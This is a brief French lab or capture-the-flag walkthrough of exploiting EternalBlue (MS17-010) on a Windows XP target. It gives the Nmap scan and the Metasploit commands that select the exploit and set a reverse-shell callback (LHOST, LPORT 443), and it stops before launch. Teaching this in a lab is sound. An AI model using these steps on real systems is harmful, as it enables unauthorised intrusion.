Eternalblue Exploitation

Eternalblue Exploitation - SMB [MS17-010]

L'analyse Nmap nous indique que le serveur cible exécute une version de Windows XP, ce qui nous permet de tenter l'exploitation de la vulnérabilité MS17-010.

Nous lançons un scan Nmap pour vérifier la présence de cette vulnérabilité :

nmap --script "vuln and safe" -p445 10.10.10.4 -oN smbScan

Ce scan confirme que la machine est vulnérable à MS17-010.

Exploitation avec Metasploit

Nous recherchons l'exploit dans Metasploit :

msfconsole 
search eternalblue

Nous sélectionnons le premier exploit listé :

use 1

Nous configurons les options :

set RHOSTS 10.10.10.4
set LHOST 10.10.14.50
set LPORT 443

Puis, nous lançons l'exploit :

Mis à jour il y a 1 an

hashtagEternalblue Exploitation - SMB [MS17-010]

hashtagExploitation avec Metasploit

Eternalblue Exploitation - SMB [MS17-010]

Exploitation avec Metasploit